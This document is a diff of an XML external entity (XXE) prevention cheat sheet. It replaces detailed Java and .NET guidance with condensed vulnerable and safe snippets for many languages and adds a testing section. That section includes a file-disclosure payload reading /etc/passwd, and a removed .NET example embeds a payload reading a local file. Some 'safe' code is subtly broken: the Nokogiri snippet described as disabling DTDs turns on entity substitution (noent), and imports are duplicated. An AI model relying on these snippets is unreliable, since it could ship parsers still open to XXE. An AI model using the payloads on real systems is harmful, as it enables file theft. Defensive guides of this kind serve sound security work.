+            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
+        } catch (IllegalArgumentException ignore) {
+            // some providers may not support these attributes
+        }
 
-DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-
-String[] featuresToDisable = {
-    // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities
-    // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities
-    // JDK7+ - http://xml.org/sax/features/external-general-entities
-    //This feature has to be used together with the following one, otherwise it will not protect you from XXE for sure
-    "http://xml.org/sax/features/external-general-entities",
-
-    // Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities
-    // Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities
-    // JDK7+ - http://xml.org/sax/features/external-parameter-entities
-    //This feature has to be used together with the previous one, otherwise it will not protect you from XXE for sure
-    "http://xml.org/sax/features/external-parameter-entities",
-
-    // Disable external DTDs as well
-    "http://apache.org/xml/features/nonvalidating/load-external-dtd"
-}
-
-for (String feature : featuresToDisable) {
-    try {    
-        dbf.setFeature(FEATURE, false); 
-    } catch (ParserConfigurationException e) {
-        // This should catch a failed setFeature feature
-        logger.info("ParserConfigurationException was thrown. The feature '" + feature
-        + "' is probably not supported by your XML processor.");
-        ...
+        DocumentBuilder builder = dbf.newDocumentBuilder();
+        // No-op entity resolver
+        builder.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
+        return builder.parse(xmlFile);
     }
 }
-
-try {
-    // Add these as per Timothy Morgan's 2014 paper: "XML Schema, DTD, and Entity Attacks"
-    dbf.setXIncludeAware(false);
-    dbf.setExpandEntityReferences(false);
-        
-    // As stated in the documentation, "Feature for Secure Processing (FSP)" is the central mechanism that will
-    // help you safeguard XML processing. It instructs XML processors, such as parsers, validators, 
-    // and transformers, to try and process XML securely, and the FSP can be used as an alternative to
-    // dbf.setExpandEntityReferences(false); to allow some safe level of Entity Expansion
-    // Exists from JDK6.
-    dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
-
-    // And, per Timothy Morgan: "If for some reason support for inline DOCTYPEs are a requirement, then
-    // ensure the entity settings are disabled (as shown above) and beware that SSRF attacks
-    // (http://cwe.mitre.org/data/definitions/918.html) and denial
-    // of service attacks (such as billion laughs or decompression bombs via "jar:") are a risk."
-
-    // remaining parser logic
-    ...
-} catch (ParserConfigurationException e) {
-    // This should catch a failed setFeature feature
-    logger.info("ParserConfigurationException was thrown. The feature 'XMLConstants.FEATURE_SECURE_PROCESSING'"
-    + " is probably not supported by your XML processor.");
-    ...
-} catch (SAXException e) {
-    // On Apache, this should be thrown when disallowing DOCTYPE
-    logger.warning("A DOCTYPE was passed into the XML document");
-    ...
-} catch (IOException e) {
-    // XXE that points to a file that doesn't exist
-    logger.error("IOException occurred, XXE may still possible: " + e.getMessage());
-    ...
-}
-
-// Load XML file or stream using a XXE agnostic configured parser...
-DocumentBuilder safebuilder = dbf.newDocumentBuilder();
 ```
 
-[Xerces 1](https://xerces.apache.org/xerces-j/) [Features](https://xerces.apache.org/xerces-j/features.html):
+#### Safe example — XMLInputFactory (StAX)
+```java
+import javax.xml.stream.XMLInputFactory;
+import javax.xml.stream.XMLStreamReader;
+import javax.xml.XMLConstants;
+import javax.xml.stream.XMLStreamException;
+import javax.xml.stream.FactoryConfigurationError;
+import javax.xml.stream.XMLStreamException;
 
-- Do not include external entities by setting [this feature](https://xerces.apache.org/xerces-j/features.html#external-general-entities) to `false`.
-- Do not include parameter entities by setting [this feature](https://xerces.apache.org/xerces-j/features.html#external-parameter-entities) to `false`.
-- Do not include external DTDs by setting [this feature](https://xerces.apache.org/xerces-j/features.html#load-external-dtd) to `false`.
-
-[Xerces 2](https://xerces.apache.org/xerces2-j/) [Features](https://xerces.apache.org/xerces2-j/features.html):
-
-- Disallow an inline DTD by setting [this feature](https://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl) to `true`.
-- Do not include external entities by setting [this feature](https://xerces.apache.org/xerces2-j/features.html#external-general-entities) to `false`.
-- Do not include parameter entities by setting [this feature](https://xerces.apache.org/xerces2-j/features.html#external-parameter-entities) to `false`.
-- Do not include external DTDs by setting [this feature](https://xerces.apache.org/xerces-j/features.html#load-external-dtd) to `false`.
-
-**Note:** The above defenses require Java 7 update 67, Java 8 update 20, or above, because the countermeasures for `DocumentBuilderFactory` and SAXParserFactory are broken in earlier Java versions, per: [CVE-2014-6517](http://www.cvedetails.com/cve/CVE-2014-6517/).
-
-### XMLInputFactory (a StAX parser)
-
-[StAX](http://en.wikipedia.org/wiki/StAX) parsers such as [`XMLInputFactory`](http://docs.oracle.com/javase/7/docs/api/javax/xml/stream/XMLInputFactory.html) allow various properties and features to be set.
-
-To protect a Java `XMLInputFactory` from XXE, disable DTDs (doctypes) altogether:
-
-``` java
-// This disables DTDs entirely for that factory
-xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+XMLInputFactory xif = XMLInputFactory.newFactory();
+xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
+// When creating readers, the factory already blocks DTDs/external entities
 ```
 
-or if you can't completely disable DTDs:
-
-``` java
-// This causes XMLStreamException to be thrown if external DTDs are accessed.
-xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-// disable external entities
-xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
-```
-
-The setting `xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");` is not required, as XMLInputFactory is dependent on Validator to perform XML validation against Schemas. Check the [Validator](#validator) section for the specific configuration.
-
-### Oracle DOM Parser
-
-Follow [Oracle recommendation](https://docs.oracle.com/en/database/oracle/oracle-database/18/adxdk/security-considerations-oracle-xml-developers-kit.html#GUID-45303542-41DE-4455-93B3-854A826EF8BB) e.g.:
-
-``` java
-    // Extend oracle.xml.parser.v2.XMLParser
-    DOMParser domParser = new DOMParser();
-
-    // Do not expand entity references
-    domParser.setAttribute(DOMParser.EXPAND_ENTITYREF, false);
-
-    // dtdObj is an instance of oracle.xml.parser.v2.DTD
-    domParser.setAttribute(DOMParser.DTD_OBJECT, dtdObj);
-
-    // Do not allow more than 11 levels of entity expansion
-    domParser.setAttribute(DOMParser.ENTITY_EXPANSION_DEPTH, 12);
-```
-
-### TransformerFactory
-
-To protect a `javax.xml.transform.TransformerFactory` from XXE, do this:
-
-``` java
+#### TransformerFactory and Validator
+```java
 TransformerFactory tf = TransformerFactory.newInstance();
 tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
 tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
+
+SchemaFactory sf = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
+sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
 ```
 
-### Validator
+#### Notes
+- Use per-call `try/catch` around `setFeature` as not all providers support all options; handle fallbacks explicitly and fail safe.
+- Add unit tests that parse malicious payloads and assert exceptions or safe behavior.
 
-To protect a `javax.xml.validation.Validator` from XXE, do this:
+---
 
-``` java
-SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-Schema schema = factory.newSchema();
-Validator validator = schema.newValidator();
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
+### .NET (Modern guidance for .NET 6/7, and .NET Framework notes)
+
+**High-level guidance:** Prefer `XmlReader` with `XmlReaderSettings` configured securely, or `XDocument.Load(XmlReader)` to ensure safe parsing. On modern .NET (Core/5/6/7) most readers are secure by default, but always set `DtdProcessing` and `XmlResolver` explicitly when consuming untrusted input.
+
+#### Vulnerable example (do NOT use)
+```csharp
+// Using XmlDocument without disabling XmlResolver
+var xmlDoc = new XmlDocument();
+xmlDoc.Load("input.xml"); // may be vulnerable in older frameworks or if XmlResolver is set
 ```
 
-### SchemaFactory
+#### Safe example — XmlReaderSettings (recommended)
+```csharp
+using System.Xml;
 
-To protect a `javax.xml.validation.SchemaFactory` from XXE, do this:
+var settings = new XmlReaderSettings
+{
+    DtdProcessing = DtdProcessing.Prohibit, // or Ignore
+    XmlResolver = null,                     // Disable external resource resolution
+    MaxCharactersFromEntities = 1024,       // if available, limit entity expansion
+    // set other resource limits when available in runtime
+};
 
-``` java
-SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-Schema schema = factory.newSchema(Source);
+using var reader = XmlReader.Create("input.xml", settings);
+var doc = new System.Xml.XmlDocument();
+doc.Load(reader);
 ```
 
-### SAXTransformerFactory
+#### Safe example — XDocument with XmlReader
+```csharp
+using System.Xml;
+using System.Xml.Linq;
 
-To protect a `javax.xml.transform.sax.SAXTransformerFactory` from XXE, do this:
-
-``` java
-SAXTransformerFactory sf = SAXTransformerFactory.newInstance();
-sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
-sf.newXMLFilter(Source);
+var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
+using var r = XmlReader.Create("input.xml", settings);
+var xdoc = XDocument.Load(r);
 ```
 
-**Note: Use of the following `XMLConstants` requires JAXP 1.5, which was added to Java in 7u40 and Java 8:**
+#### ASP.NET considerations
+- In .NET Framework apps, `Web.config` `<httpRuntime targetFramework="4.5.2" />` impacted defaults historically. For modern apps, target latest runtime and set explicit settings.
+- Avoid enabling `XmlResolver` or setting custom resolvers that access remote resources for untrusted XML.
 
-- `javax.xml.XMLConstants.ACCESS_EXTERNAL_DTD`
-- `javax.xml.XMLConstants.ACCESS_EXTERNAL_SCHEMA`
-- `javax.xml.XMLConstants.ACCESS_EXTERNAL_STYLESHEET`
+#### Notes
+- `XmlSerializer` typically reads XML into objects — ensure sources are processed via secure `XmlReader`.
+- Remove references to old community projects (e.g., `dotnet_security_unit_testing`) — prefer official MS docs and supported tests.
 
-### XMLReader
+---
 
-To protect the Java `org.xml.sax.XMLReader` from an XXE attack, do this:
+### Python (defusedxml, ElementTree, lxml)
 
-``` java
-XMLReader reader = XMLReaderFactory.createXMLReader();
-reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.
-reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
-reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
-reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+**Guidance:** Use `defusedxml` wrappers for stdlib modules. Avoid `xml.sax`, `xml.dom.minidom`, and `xml.parsers.expat` directly for untrusted input unless using defused wrappers.
+
+#### Safe example — defusedxml.ElementTree
+```python
+from defusedxml.ElementTree import parse
+
+with open('input.xml', 'rb') as f:
+    tree = parse(f)  # defusedxml blocks external entities and entity expansion
 ```
 
-### SAXReader
+#### Safe example — lxml with disabled resolve/entities
+```python
+from lxml import etree
 
-To protect a Java `org.dom4j.io.SAXReader` from an XXE attack, do this:
-
-``` java
-saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
-saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
+tree = etree.parse('input.xml', parser)
 ```
 
-If your code does not have all of these lines, you could be vulnerable to an XXE attack.
+#### Notes
+- `defusedxml` provides hardened replacements for standard modules: `defusedxml.ElementTree`, `defusedxml.minidom`, `defusedxml.sax`, `defusedxml.expatbuilder`.
+- If you must use stdlib parsers, wrap them with defusedxml or manually disable entity resolution where possible.
 
-### SAXBuilder
+---
 
-To protect a Java `org.jdom2.input.SAXBuilder` from an XXE attack, disallow DTDs (doctypes) entirely:
+### PHP (libxml / SimpleXML / DOMDocument)
 
-``` java
-SAXBuilder builder = new SAXBuilder();
-builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
-Document doc = builder.build(new File(fileName));
+**Modern PHP:** PHP 8 makes some behavior safer, but do not rely on defaults for older versions.
+
+#### Vulnerable example
+```php
+$xml = simplexml_load_file('input.xml'); // prior to PHP 8, may be vulnerable
 ```
 
-Alternatively, if DTDs can't be completely disabled, disable external entities and entity expansion:
-
-``` java
-SAXBuilder builder = new SAXBuilder();
-builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
-builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
-builder.setExpandEntities(false);
-Document doc = builder.build(new File(fileName));
+#### Safe example
+```php
+libxml_disable_entity_loader(true); // deprecated in PHP 8.0, but needed in older versions
+$dom = new DOMDocument();
+$dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET); // prevents network access
+// or
+$xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET);
 ```
 
-### No-op EntityResolver
+#### Notes
+- Use `LIBXML_NONET` flag when loading/parsing.
+- `libxml_disable_entity_loader(true)` is deprecated in PHP 8.0 — prefer `LIBXML_NONET` and `DOMDocument::loadXML` with flags.
 
-For APIs that take an `EntityResolver`, you can neutralize an XML parser's ability to resolve entities by [supplying a no-op implementation](https://wiki.sei.cmu.edu/confluence/display/java/IDS17-J.+Prevent+XML+External+Entity+Attacks):
+---
 
-```java
-public final class NoOpEntityResolver implements EntityResolver {
-    public InputSource resolveEntity(String publicId, String systemId) {
-        return new InputSource(new StringReader(""));
-    }
-}
+### JavaScript / Node.js (xml2js, fast-xml-parser, sax-js)
 
-// ...
+**Guidance:** Many Node XML parsers do not evaluate external entities by default; however, always verify library behavior and use safe config.
 
-xmlReader.setEntityResolver(new NoOpEntityResolver());
-documentBuilder.setEntityResolver(new NoOpEntityResolver());
+#### xml2js (example)
+```javascript
+const fs = require('fs');
+const xml2js = require('xml2js');
+
+const parser = new xml2js.Parser({explicitCharkey: false});
+const xml = fs.readFileSync('input.xml', 'utf8');
+// xml2js does not resolve external entities by default, but do not pass data to other native parsers that may
+parser.parseString(xml, function(err, result) {
+    // handle result
+});
 ```
 
-or more simply:
-
-```java
-EntityResolver noop = (publicId, systemId) -> new InputSource(new StringReader(""));
-xmlReader.setEntityResolver(noop);
-documentBuilder.setEntityResolver(noop);
+#### fast-xml-parser (example)
+```javascript
+const { XMLParser } = require('fast-xml-parser');
+const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: true });
+// fast-xml-parser is non-validating and does not process external entities
 ```
 
-### JAXB Unmarshaller
+#### Notes
+- If you call into native bindings or use libraries that leverage libxml2, check their configs.
+- Avoid using XML parsing libraries that execute embedded scripts or templates.
 
-**You should ensure that the source to the `unmarshal` function of `javax.xml.bind.Unmarshaller` is `javax.xml.stream.XMLStreamReader` that was generated using `javax.xml.stream.XMLInputFactory` with safe properties, i.e. `XMLInputFactory.SUPPORT_DTD` and `XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES` set to `false`.** For example:
+---
 
-``` java
-File file = new File(xmlPath);
-XMLInputFactory xif = XMLInputFactory.newFactory();
-xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
-xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
-XMLStreamReader xsr = null;
-try {
-    xsr = xif.createXMLStreamReader(new StreamSource(file));
-} catch (XMLStreamException e) {
-    throw new RuntimeException(e);
-}  
-Unmarshaller um = jc.createUnmarshaller();
-um.unmarshal(xsr);
+### Ruby (REXML, Nokogiri)
+
+**REXML:** historically vulnerable. Prefer disabling entity expansion or using safe parsers.
+
+#### vulnerable - REXML (do not use for untrusted input)
+```ruby
+require 'rexml/document'
+doc = REXML::Document.new(File.read('input.xml')) # REXML will expand entities by default
 ```
 
-Note that both the `createXMLStreamReader` and `unmarshal` methods have several overloads with various source types, so you need to pick the right one and do a possible conversion.
-
-### XPathExpression
-
-**Since `javax.xml.xpath.XPathExpression` can not be configured securely by itself, the untrusted data must be parsed through another securable XML parser first.**
-
-For example:
-
-``` java
-DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-DocumentBuilder builder = df.newDocumentBuilder();
-String result = new XPathExpression().evaluate( builder.parse(
-                            new ByteArrayInputStream(xml.getBytes())) );
+#### safe - Nokogiri
+```ruby
+require 'nokogiri'
+xml = File.read('input.xml')
+# Use non-network and disable DTD
+doc = Nokogiri::XML(xml) { |config| config.nonet.nonet.noent.nonet }
+# preferred:
+doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
 ```
 
-### java.beans.XMLDecoder
+#### Notes
+- `Nokogiri::XML::ParseOptions::NONET` prevents network access.
+- Avoid `:noent` (entity substitution) unless necessary and controlled.
 
-**The [readObject()](https://docs.oracle.com/javase/8/docs/api/java/beans/XMLDecoder.html#readObject--) method in this class is fundamentally unsafe.**
+---
 
-**Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and [execute arbitrary code as described here](http://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files).**
+### C / C++ (libxml2, Xerces)
 
-**And there is no way to make use of this class safe except to trust or properly validate the input being passed into it.**
+#### libxml2 (C)
+- Avoid enabling `XML_PARSE_NOENT` or `XML_PARSE_DTDLOAD`.
+- Use `xmlReadMemory`/`xmlReadFile` with options that disable DTD and external entities:
+```c
+xmlReadFile("input.xml", NULL, XML_PARSE_NONET | XML_PARSE_NOENT); // caution with NOENT
+// Instead:
+xmlReadFile("input.xml", NULL, XML_PARSE_NONET);
+```
+- Use `XML_PARSE_NONET` to block network access.
 
-**As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.**
-
-### Other XML Parsers
-
-**There are many third-party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default.** If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions like the examples given above. If there's no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to insecure third-party parser similar to how the Unmarshaller is secured.
-
-#### Spring Framework MVC/OXM XXE Vulnerabilities
-
-**Some XXE vulnerabilities were found in [Spring OXM](https://pivotal.io/security/cve-2013-4152) and [Spring MVC](https://pivotal.io/security/cve-2013-7315) . The following versions of the Spring Framework are vulnerable to XXE:
-
-- **3.0.0** to **3.2.3** (Spring OXM & Spring MVC)
-- **4.0.0.M1** (Spring OXM)
-- **4.0.0.M1-4.0.0.M2** (Spring MVC)
-
-There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.
-
-For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. **Note that the CVE for Spring OXM specifically indicates that two XML parsing situations are up to the developer to get right, and the other two are the responsibility of Spring and were fixed to address this CVE.**
-
-Here's what they say:
-
-Two situations developers must handle:
-
-- For a `DOMSource`, the XML has already been parsed by user code and that code is responsible for protecting against XXE.
-- For a `StAXSource`, the XMLStreamReader has already been created by user code and that code is responsible for protecting against XXE.
-
-The issue Spring fixed:
-
-For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.
-
-Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:
-
-``` java
-import org.springframework.oxm.Jaxb2Marshaller;
-import org.springframework.oxm.jaxb.Jaxb2Marshaller;
-
-Jaxb2Marshaller marshaller = new Jaxb2Marshaller();
-// Must cast return Object to whatever type you are unmarshalling
-marshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML));
+#### Xerces-C++
+```cpp
+parser->setDisableDefaultEntityResolution(true);
+parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 ```
 
-So, per the [Spring OXM CVE writeup](https://pivotal.io/security/cve-2013-4152), the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.
+---
 
-#### Castor
+### iOS / macOS (NSXML, libxml2) — legacy note
 
-**Castor is a data binding framework for Java. It allows conversion between Java objects, XML, and relational tables. The XML features in Castor prior to version 1.3.3 are vulnerable to XXE, and should be upgraded to the latest version.** For additional information, check the official [XML configuration file](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-properties.html)
+**Important:** Many sections in older versions referenced iOS 4–6. Those are outdated. iOS/macOS libraries and SDKs have evolved. For app code targeting modern iOS/macOS, consult latest Apple docs. Below are general notes:
 
-## .NET
+- If using libxml2 directly, apply the libxml2 guidance (use NONET, do not load external DTDs).
+- For Foundation `XMLParser` or `NSXMLDocument`, prefer APIs that allow disabling external entity loading or set `shouldResolveExternalEntities` / similar to false.
+- Flagged legacy: Any advice referencing iOS 6 must be reviewed by an iOS expert — this file marks those older specifics as deprecated and removed where ambiguous.
 
-**Up-to-date information for XXE injection in .NET is taken directly from the [web application of unit tests by Dean Fleming](https://github.com/deanf1/dotnet-security-unit-tests), which covers all currently supported .NET XML parsers, and has test cases that demonstrate when they are safe from XXE injection and when they are not, but these tests are only with injection from file and not direct DTD (used by DoS attacks).**
+---
 
-For DoS attacks using a direct DTD (such as the [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack)), a [separate testing application from Josh Grossman at Bounce Security](https://github.com/BounceSecurity/BillionLaughsTester) has been created to verify that .NET >=4.5.2 is safe from these attacks.
+### ColdFusion / Lucee
 
-Previously, this information was based on some older articles which may not be 100% accurate including:
-
-- [James Jardine's excellent .NET XXE article](https://www.jardinesoftware.net/2016/05/26/xxe-and-net/).
-- [Guidance from Microsoft on how to prevent XXE and XML Denial of Service in .NET](http://msdn.microsoft.com/en-us/magazine/ee335713.aspx).
-
-### Overview of .NET Parser Safety Levels
-
-**Below is an overview of all supported .NET XML parsers and their default safety levels. More details about each parser are included after this list.
-
-**XDocument (LINQ to XML)
-
-This parser is protected from external entities at .NET Framework version 4.5.2 and protected from Billion Laughs at version 4.5.2 or greater, but it is uncertain if this parser is protected from Billion Laughs before version 4.5.2.
-
-#### XmlDocument, XmlTextReader, XPathNavigator default safety levels
-
-These parsers are vulnerable to external entity attacks and Billion Laughs at versions below version 4.5.2 but protected at versions equal or greater than 4.5.2.
-
-#### XmlDictionaryReader, XmlNodeReader, XmlReader default safety levels
-
-These parsers are not vulnerable to external entity attacks or Billion Laughs before or after version 4.5.2. Also, at or greater than versions ≥4.5.2, these libraries won't even process the in-line DTD by default. Even if you change the default to allow processing a DTD, if a DoS attempt is performed an exception will still be thrown as documented above.
-
-### ASP.NET
-
-ASP.NET applications ≥ .NET 4.5.2 must also ensure setting the `<httpRuntime targetFramework="..." />` in their `Web.config` to ≥4.5.2 or risk being vulnerable regardless or the actual .NET version. Omitting this tag will also result in unsafe-by-default behavior.
-
-For the purpose of understanding the above table, the `.NET Framework Version` for an ASP.NET applications is either the .NET version the application was build with or the httpRuntime's `targetFramework` (Web.config), **whichever is lower**.
-
-This configuration tag should not be confused with a similar configuration tag: `<compilation targetFramework="..." />` or the assemblies / projects targetFramework, which are **not** sufficient for achieving secure-by-default behaviour as advertised in the above table.
-
-### LINQ to XML
-
-**Both the `XElement` and `XDocument` objects in the `System.Xml.Linq` library are safe from XXE injection from external file and DoS attack by default.** `XElement` parses only the elements within the XML file, so DTDs are ignored altogether. `XDocument` has XmlResolver [disabled by default](https://docs.microsoft.com/en-us/dotnet/standard/linq/linq-xml-security) so it's safe from SSRF. Whilst DTDs are [enabled by default](https://referencesource.microsoft.com/#System.Xml.Linq/System/Xml/Linq/XLinq.cs,71f4626a3d6f9bad), from Framework versions ≥4.5.2, it is **not** vulnerable to DoS as noted but it may be vulnerable in earlier Framework versions. For more information, see [Microsoft's guidance on how to prevent XXE and XML Denial of Service in .NET](http://msdn.microsoft.com/en-us/magazine/ee335713.aspx)
-
-### XmlDictionaryReader
-
-**`System.Xml.XmlDictionaryReader` is safe by default, as when it attempts to parse the DTD, the compiler throws an exception saying that "CData elements not valid at top level of an XML document". It becomes unsafe if constructed with a different unsafe XML parser.**
-
-### XmlDocument
-
-**Prior to .NET Framework version 4.5.2, `System.Xml.XmlDocument` is unsafe by default. The `XmlDocument` object has an `XmlResolver` object within it that needs to be set to null in versions prior to 4.5.2. In versions 4.5.2 and up, this `XmlResolver` is set to null by default.**
-
-The following example shows how it is made safe:
-
-``` csharp
- static void LoadXML()
- {
-   string xxePayload = "<!DOCTYPE doc [<!ENTITY win SYSTEM 'file:///C:/Users/testdata2.txt'>]>"
-                     + "<doc>&win;</doc>";
-   string xml = "<?xml version='1.0' ?>" + xxePayload;
-
-   XmlDocument xmlDoc = new XmlDocument();
-   // Setting this to NULL disables DTDs - Its NOT null by default.
-   xmlDoc.XmlResolver = null;
-   xmlDoc.LoadXml(xml);
-   Console.WriteLine(xmlDoc.InnerText);
-   Console.ReadLine();
- }
+#### Adobe ColdFusion (example)
+```cfml
+<cfset parserOptions = structNew()>
+<cfset parserOptions.ALLOWEXTERNALENTITIES = false>
+<cfscript>
+  doc = XmlParse(FileRead("input.xml"), false, parserOptions);
+</cfscript>
 ```
 
-**For .NET Framework version ≥4.5.2, this is safe by default**.
-
-`XmlDocument` can become unsafe if you create your own nonnull `XmlResolver` with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the [referenced MSDN article](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).
-
-### XmlNodeReader
-
-`System.Xml.XmlNodeReader` objects are safe by default and will ignore DTDs even when constructed with an unsafe parser or wrapped in another unsafe parser.
-
-### XmlReader
-
-`System.Xml.XmlReader` objects are safe by default.
-
-They are set by default to have their ProhibitDtd property set to false in .NET Framework versions 4.0 and earlier, or their `DtdProcessing` property set to Prohibit in .NET versions 4.0 and later.
-
-Additionally, in .NET versions 4.5.2 and later, the `XmlReaderSettings` belonging to the `XmlReader` has its `XmlResolver` set to null by default, which provides an additional layer of safety.
-
-Therefore, `XmlReader` objects will only become unsafe in version 4.5.2 and up if both the `DtdProcessing` property is set to Parse and the `XmlReaderSetting`'s `XmlResolver` is set to a nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the [referenced MSDN article](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).
-
-### XmlTextReader
-
-`System.Xml.XmlTextReader` is **unsafe** by default in .NET Framework versions prior to 4.5.2. Here is how to make it safe in various .NET versions:
-
-#### Prior to .NET 4.0
-
-In .NET Framework versions prior to 4.0, DTD parsing behavior for `XmlReader` objects like `XmlTextReader` are controlled by the Boolean `ProhibitDtd` property found in the `System.Xml.XmlReaderSettings` and `System.Xml.XmlTextReader` classes.
-
-Set these values to true to disable inline DTDs completely.
-
-``` csharp
-XmlTextReader reader = new XmlTextReader(stream);
-// NEEDED because the default is FALSE!!
-reader.ProhibitDtd = true;  
+#### Lucee
+Set in `Application.cfc`:
+```cfml
+this.xmlFeatures = {
+    externalGeneralEntities: false,
+    secure: true,
+    disallowDoctypeDecl: true
+};
 ```
 
-#### .NET 4.0 - .NET 4.5.2
+---
 
-**In .NET Framework version 4.0, DTD parsing behavior has been changed. The `ProhibitDtd` property has been deprecated in favor of the new `DtdProcessing` property.**
+## 6. Vulnerable vs Safe code snippets (per language) — quick list
 
-**However, they didn't change the default settings so `XmlTextReader` is still vulnerable to XXE by default.**
+- **Vulnerable:** parsing XML with default DOM parsers without disabling DTDs or resolvers.
+- **Safe:** create parser settings that explicitly disallow DTDs, set resolvers to null/no-op, and use nonet flags.
 
-**Setting `DtdProcessing` to `Prohibit` causes the runtime to throw an exception if a `<!DOCTYPE>` element is present in the XML.**
+(See language sections above for copy-paste-ready safe snippets.)
 
-To set this value yourself, it looks like this:
+---
 
-``` csharp
-XmlTextReader reader = new XmlTextReader(stream);
-// NEEDED because the default is Parse!!
-reader.DtdProcessing = DtdProcessing.Prohibit;  
+## 7. Testing and validation
+
+### Tools
+- Burp Suite / Burp Collaborator (in-band & OOB testing)
+- OWASP ZAP
+- XXE-specific tools and scanners (XXEBugFind, ssexxe)
+- Custom local listeners (netcat) and OOB endpoints (interactsh, Burp Collaborator)
+
+### Sample payloads
+
+**File disclosure (classic):**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<foo>&xxe;</foo>
 ```
 
-Alternatively, you can set the `DtdProcessing` property to `Ignore`, which will not throw an exception on encountering a `<!DOCTYPE>` element but will simply skip over it and not process it. Finally, you can set `DtdProcessing` to `Parse` if you do want to allow and process inline DTDs.
-
-#### .NET 4.5.2 and later
-
-In .NET Framework versions 4.5.2 and up, `XmlTextReader`'s internal `XmlResolver` is set to null by default, making the `XmlTextReader` ignore DTDs by default. The `XmlTextReader` can become unsafe if you create your own nonnull `XmlResolver` with default or unsafe settings.
-
-### XPathNavigator
-
-`System.Xml.XPath.XPathNavigator` is **unsafe** by default in .NET Framework versions prior to 4.5.2.
-
-This is due to the fact that it implements `IXPathNavigable` objects like `XmlDocument`, which are also unsafe by default in versions prior to 4.5.2.
-
